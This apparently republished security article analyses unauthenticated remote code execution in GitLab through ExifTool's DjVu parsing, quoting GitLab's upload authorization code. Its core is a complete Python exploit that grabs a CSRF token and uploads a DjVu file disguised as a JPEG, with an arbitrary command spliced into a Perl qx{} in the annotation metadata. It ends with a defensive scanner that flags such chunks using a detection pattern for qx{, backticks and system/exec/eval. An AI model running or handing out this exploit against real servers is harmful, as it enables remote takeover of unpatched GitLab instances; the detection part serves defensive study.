Security RCE: Unauthenticated Access Analysis (22)
2023-05-02 Source: 飞速影视
authorize is defined in app/controllers/concerns/uploads_actions.rb. The code is as follows:

def authorize
  set_workhorse_internal_api_content_type

  authorized = uploader_class.workhorse_authorize(
    has_length: false,
    maximum_size: Gitlab::CurrentSettings.max_attachment_size.megabytes.to_i)

  render json: authorized
end

def model
  strong_memoize(:model) { find_model }
end
Before authorize is reached in UploadsController, the two methods defined earlier, authorize_create_access! and verify_workhorse_api!, must run first: one checks the permission to upload, the other validates the JWT portion of the request to make sure it came from Workhorse. Start by testing with the exploit; the code is as follows (the multipart body and the \x escapes were flattened in the original listing and are restored here; the CSRF token is now located by its meta name rather than by a fixed index into the meta tags):

import sys

import requests
from bs4 import BeautifulSoup

requests.packages.urllib3.disable_warnings()


def EXP(url, command):
    session = requests.Session()
    # Optional Burp proxy; not passed to the requests below. Add proxies=proxies
    # to session.get/session.post to inspect the traffic.
    proxies = {
        "http": "127.0.0.1:8080",
        "https": "127.0.0.1:8080"
    }
    try:
        # The sign-in page is reachable without an account and carries a CSRF token.
        r = session.get(url.strip("/") + "/users/sign_in", verify=False)
        soup = BeautifulSoup(r.text, features="lxml")
        token = soup.find("meta", attrs={"name": "csrf-token"}).get("content")
        # A DjVu file disguised as test.jpg. The ANTa annotation chunk carries a
        # Perl expression in the Copyright metadata; `command` is spliced into
        # qx{...} and executed when ExifTool parses the file. The body is a str
        # with \x escapes; http.client sends it latin-1 encoded, byte for byte.
        data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n (Copyright \"\\\n\" . qx{" + command + "} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}",
            "Accept-Encoding": "gzip, deflate"
        }
        # The server only answers this way after ExifTool has processed (and
        # choked on) the crafted file, so the error text doubles as the success marker.
        flag = "Failed to process image"
        req = session.post(url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
        x = req.text
        if flag in x:
            print("success!!!")
        else:
            print("No Vuln!!!")
    except Exception as e:
        print(e)


if __name__ == "__main__":
    EXP(sys.argv[1], sys.argv[2])
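The exploit works because the file is identified by its content, not by the .jpg name or the image/jpeg content type, and because the Copyright string inside the DjVu ANTa annotation chunk reaches a Perl eval. The following scanner is an added example, not code from the article or from GitLab: it walks the IFF chunk tree of a DjVu blob (AT&T magic, then FORM chunks with 4-byte big-endian lengths and even-byte padding) and flags ANTa chunks whose text contains Perl code constructs such as qx{...}. The two sample files are constructed inline with correct chunk lengths; the regex and the list of suspicious constructs are my own choices. Compressed ANTz chunks would need BZZ decompression first and are not inspected here.

```python
import re
import struct

# Perl constructs that never belong in DjVu annotation metadata (assumption:
# a reasonable starting list, extend as needed).
SUSPICIOUS = re.compile(rb'qx\{|qx/|`|\bsystem\s*\(|\bexec\s*\(|\beval\s*\(')


def iter_chunks(data, offset=0, end=None):
    """Yield (chunk_id, form_type, payload) for every IFF chunk, recursing into FORMs.

    form_type is the 4-byte secondary type (DJVU, DJVM, DJVI, ...) for FORM chunks
    and None for leaf chunks.
    """
    if end is None:
        end = len(data)
    while offset + 8 <= end:
        cid = data[offset:offset + 4]
        (length,) = struct.unpack(">I", data[offset + 4:offset + 8])
        body_start = offset + 8
        body_end = min(body_start + length, end)   # tolerate truncated lengths
        if cid == b"FORM":
            form_type = data[body_start:body_start + 4]
            yield cid, form_type, data[body_start + 4:body_end]
            yield from iter_chunks(data, body_start + 4, body_end)
        else:
            yield cid, None, data[body_start:body_end]
        offset = body_end + (length & 1)   # chunks are padded to an even size


def scan_djvu(blob):
    """Return [(chunk_id, matched_construct, payload_prefix)] for suspicious ANTa chunks."""
    if not blob.startswith(b"AT&T"):
        raise ValueError("not a DjVu file (missing AT&T magic)")
    findings = []
    for cid, _, payload in iter_chunks(blob, 4):
        if cid == b"ANTa":
            m = SUSPICIOUS.search(payload)
            if m:
                findings.append((cid.decode(), m.group(0).decode(errors="replace"), payload[:60]))
    return findings


# --- constructed sample files (not real uploads) -----------------------------

def chunk(cid, payload):
    """Build one IFF chunk: id, big-endian length, payload, pad byte if odd."""
    body = cid + struct.pack(">I", len(payload)) + payload
    return body + (b"\x00" if len(payload) & 1 else b"")


def form(form_type, *subchunks):
    """Build a FORM chunk whose length covers the type tag and all sub-chunks."""
    return chunk(b"FORM", form_type + b"".join(subchunks))


INFO = chunk(b"INFO", b"\x00\x08\x00\x08\x18\x00d\x00\x16\x00")   # 8x8 page, version 24
BENIGN = b"AT&T" + form(b"DJVU", INFO, chunk(b"ANTa", b'(metadata (Copyright "ACME"))'))
MALICIOUS = b"AT&T" + form(
    b"DJVU", INFO,
    chunk(b"ANTa", b'(metadata (Copyright "\\\n" . qx{id} . \\\n" b ") )'),
)


if __name__ == "__main__":
    print("benign:", scan_djvu(BENIGN))
    print("malicious:", scan_djvu(MALICIOUS))
```

Run it against files pulled from an upload directory or a WAF capture; anything that starts with AT&T but arrived as image/jpeg is already worth a look, and a hit on qx{ or a backtick inside ANTa is the signature of this technique.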